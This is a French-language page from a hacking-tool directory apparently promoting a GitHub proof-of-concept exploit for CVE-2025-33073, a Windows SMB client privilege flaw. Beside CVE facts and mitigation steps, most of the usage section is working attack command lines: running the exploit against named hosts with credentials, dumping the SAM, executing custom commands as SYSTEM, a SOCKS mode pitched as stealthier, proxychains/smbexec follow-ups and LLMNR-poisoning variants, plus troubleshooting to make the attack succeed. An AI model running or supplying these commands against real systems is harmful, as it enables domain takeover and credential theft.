Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
Outils/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Analyse des VulnérabilitésExploitationMouvement LatéralTests d'IntrusionCommandement et ContrôleRed TeamingDéveloppement de Charges Utiles
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

Voir le dépôt
16il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

✨ CVE-2025-33073 : Vulnérabilité RCE SMB Windows 🚨

🔥 Exécution de code à distance authentifiée de haute sévérité 🔥 Contrôle d'accès inapproprié dans le client SMB Windows (CWE-284)


🛡️ Détails clés en un coup d'œil

Télécharger l’outil
AspectDétails
Score CVSS v3.18.8 (Élevé) 🔥
Systèmes affectésWindows 10, 11, Server 2012–2025 (toutes éditions) 💻
Date de divulgation10 juin 2025 📅 (Corrigé dans le Patch Tuesday de juin 2025)
ExploitationActivement exploitée dans la nature 😱
Ajouté au CISA KEV le 21 octobre 2025
Vecteur d'attaqueRéseau (Authentifié) 🌐
ImpactExécution de code au niveau SYSTEM 👑
Mouvement latéral via relais Kerberos
ContournementContournement des mesures d'atténuation de réflexion NTLM ⚡

🛠️ Mesures d'atténuation immédiates

  1. Corrigez maintenant ! 🔧
    → Appliquez les mises à jour Microsoft (ex. KB5060998)
    → Guide de mise à jour Microsoft 🔗

  2. Activez la signature SMB ✍️
    → Appliquez sur tous les clients et serveurs
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. Restreindre NTLM 🚫
    → Bloquez NTLM si possible
    → Surveillez les tentatives de relais avec des outils EDR

  4. Correction automatisée ? 🤖
    → Utilisez Vicarius vRx ou des scripts personnalisés pour une correction de masse


⚠️ Pourquoi c'est important

  • Contourne les protections NTLM traditionnelles 🛑
  • Fonctionne même si la signature SMB n'est pas appliquée
  • Permet une prise de contrôle complète du domaine dans les environnements AD mal configurés 🏰

Statut au 15 novembre 2025 :
✅ Corrigé
❌ Toujours exploitée sur les systèmes non corrigés
🔔 Date limite CISA : 10 novembre 2025 ⏰


⚠️ Exemple d'utilisation

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Commande personnalisée Au lieu d'exécuter secretsdump, une commande personnalisée peut être exécutée.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS Pour une exécution plus furtive des commandes après qu'une connexion valide en tant que SYSTEM a été établie. --target et --target-ip doivent être égaux ici.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

Une commande personnalisée peut également être exécutée via proxychains au lieu de vider la SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Exploitation manuelle sans exigence DNS

Si vous êtes dans le même domaine de diffusion que l'appareil et qu'il est vulnérable à l'empoisonnement LLMNR, il est possible d'exploiter un appareil sans avoir à enregistrer un enregistrement DNS.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Dépannage :

  • J'ai parfois constaté que l'attaque ne fonctionne pas parce que le nom d'hôte est utilisé pour l'attaque, ce qui entraîne une requête DNS depuis Kali. Si Kali n'utilise pas le serveur DNS ou si vous recevez un message '/ FAILED' de impacket-ntlmrelayx, essayez d'ajouter l'hôte à votre fichier /etc/hosts. Cela devrait permettre à l'attaque de fonctionner.

  • Si vous utilisez l'IP, l'attaque devrait fonctionner. Parfois, l'exécuter plusieurs fois aboutit à un SUCCÈS au lieu d'un échec. La raison n'est pas encore parfaitement claire. Je pense que cela a à voir avec le réseau.

  • Essayez une autre méthode de coercition en utilisant -M ou --method.


Wireshark :

Authentification NTLM locale effectuée

455252866-0a3fe643-2d52-427a-91f2-991770732f62

Authentification NTLM locale non effectuée, résultant en une tentative ÉCHOUÉE

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Bon à savoir :

  • xterm permet de copier et coller avec le bouton du milieu de la souris.
  • L'enregistrement DNS doit également être connu du client, cela peut prendre plus de temps dans certains cas. Par plus de temps, j'entends quelques minutes.
  • Ceci est juste une preuve de concept (PoC), ce qui signifie que les contournements AV/EDR n'ont pas été tentés. Utilisez à vos propres risques.

N'attendez pas — corrigez aujourd'hui ! 🛑
La sécurité de votre réseau en dépend. 💪